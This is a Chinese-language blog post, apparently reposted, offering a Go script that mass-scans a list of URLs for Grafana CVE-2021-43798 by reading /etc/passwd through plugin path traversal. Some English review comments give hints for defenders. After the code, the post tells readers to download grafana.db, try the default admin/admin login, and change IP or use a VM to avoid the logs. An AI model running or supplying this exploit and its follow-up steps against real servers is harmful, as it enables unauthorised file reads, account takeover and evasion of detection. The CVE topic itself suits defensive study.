项目地址:https://github.com/light-Life/CVE-2021-43798
用 Golang 简单写的检测脚本,用于验证 Grafana 的 CVE-2021-43798(插件静态资源路径的目录遍历,可导致任意文件读取)
package main
import (
"bufio"
"fmt"
"io"
"io/ioutil"
"net/http"
url2 "net/url"
"os"
"strings"
)
// main reads base URLs from url.txt, one per line, and for each one requests
// every Grafana plugin static path in the list below with a URL-escaped
// "../" chain ending in etc/passwd appended (the CVE-2021-43798 check this
// page describes). The first URL whose response body contains "root:" is
// printed and appended to test.txt, and the remaining paths for that base
// URL are skipped.
//
// NOTE(review): for defenders, the request shape built here is the thing to
// search for in access logs: a path under /public/plugins/<plugin-id>/
// followed by repeated "..%2F" segments (url.QueryEscape encodes "/" as %2F
// and leaves "." unchanged) — presumably logged in that encoded form; verify
// against your proxy/server log format. Remediation is upgrading Grafana to a
// release that fixes CVE-2021-43798; confirm fixed versions in the vendor
// advisory.
func main() {
fileOpen, err := os.Open("url.txt")
line := bufio.NewReader(fileOpen)
// NOTE(review): err is inspected only after fileOpen has been wrapped in the
// reader, and a failure is merely printed; execution continues regardless.
if err != nil {
fmt.Println(err)
}
// Plugin static-file route prefixes, probed in order. There are 48 entries,
// which is the count the inner loop below hard-codes.
test := []string{
"/public/plugins/alertGroups/",
"/public/plugins/alertlist/",
"/public/plugins/alertmanager/",
"/public/plugins/annolist/",
"/public/plugins/barchart/",
"/public/plugins/bargauge/",
"/public/plugins/canvas/",
"/public/plugins/cloudwatch/",
"/public/plugins/dashboard/",
"/public/plugins/dashlist/",
"/public/plugins/debug/",
"/public/plugins/elasticsearch/",
"/public/plugins/gauge/",
"/public/plugins/geomap/",
"/public/plugins/gettingstarted/",
"/public/plugins/grafana-azure-monitor-datasource/",
"/public/plugins/grafana/",
"/public/plugins/graph/",
"/public/plugins/graphite/",
"/public/plugins/heatmap/",
"/public/plugins/histogram/",
"/public/plugins/influxdb/",
"/public/plugins/jaeger/",
"/public/plugins/live/",
"/public/plugins/logs/",
"/public/plugins/loki/",
"/public/plugins/mixed/",
"/public/plugins/mssql/",
"/public/plugins/mysql/",
"/public/plugins/news/",
"/public/plugins/nodeGraph/",
"/public/plugins/opentsdb/",
"/public/plugins/piechart/",
"/public/plugins/pluginlist/",
"/public/plugins/postgres/",
"/public/plugins/prometheus/",
"/public/plugins/stat/",
"/public/plugins/state-timeline/",
"/public/plugins/status-history/",
"/public/plugins/table-old/",
"/public/plugins/table/",
"/public/plugins/tempo/",
"/public/plugins/testdata/",
"/public/plugins/text/",
"/public/plugins/timeseries/",
"/public/plugins/welcome/",
"/public/plugins/xychart/",
"/public/plugins/zipkin"}
file, err := os.Create("test.txt") // create (or truncate) the results file
// NOTE(review): a Create failure is only printed; file is still used below
// and is never closed anywhere in main.
if err != nil {
fmt.Println(err)
}
for {
// The isPrefix result is discarded, and io.EOF is the only error that ends
// the loop; any other read error is not checked here.
content, _, err := line.ReadLine()
if err == io.EOF {
break
}
fmt.Println(string(content))
// 48 is the hard-coded length of test; it must be kept in step with the slice.
for i := 0; i < 48; i++ {
// Request URL = base URL + plugin prefix + query-escaped traversal string.
url := string(content) + test[i] + url2.QueryEscape("../../../../../../../../../../../../../../../../../etc/passwd")
//fmt.Println(url)
resp, err := http.Get(url)
if err != nil {
fmt.Println(err)
continue // continue skips the rest of this iteration (comparable to pass in a Python except block).
// This matters: when http.Get returns an error there is no usable response,
// so the ioutil.ReadAll call below would hit a nil pointer; skipping the
// iteration avoids that.
}
// NOTE(review): the status code is not inspected and resp.Body is never closed.
fmt.Println(resp, url)
body, err := ioutil.ReadAll(resp.Body)
// A read error is printed, but the (possibly partial) body is still examined.
if err != nil {
fmt.Println(body, err)
}
// Substring heuristic: any body containing "root:" counts as a positive, so
// an unrelated page that happens to contain that text would match as well.
if find := strings.Contains(string(body), "root:"); find {
fmt.Println("\n\u001B[1;32m[+] 存在漏洞\u001B[0m", url)
// data is the byte count returned by io.WriteString; the progress message
// is printed before the write error is checked.
data, err := io.WriteString(file, url+"\n")
fmt.Println("\n\u001B[1;33m[+] 正在写入\u001B[0m")
if err != nil {
fmt.Println(data, err)
}
// Stop probing further plugin paths for this base URL after the first match.
break
} else {
fmt.Println("\n\u001B[1;31m[-] 无法识别\u001B[0m", url)
}
}
}
}
直接go run hello.go运行即可
验证存在后访问var/lib/grafana/grafana.db
即可下载这个数据库文件打开user的表
密码是加了盐的,一般无法破解(加盐是为了应对短密码被彩虹表爆出来,也就是碰撞。盐(salt)是个随机值,加密大概公式为md5(md5(passwd)+salt),每多一位破解难度成指数上升)
发现这login为admin的一般密码也为admin
登录进去即可,记得改ip或在虚拟机登录,后台会有详细记录的
FROM:浅浅淡淡[hellohy]
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。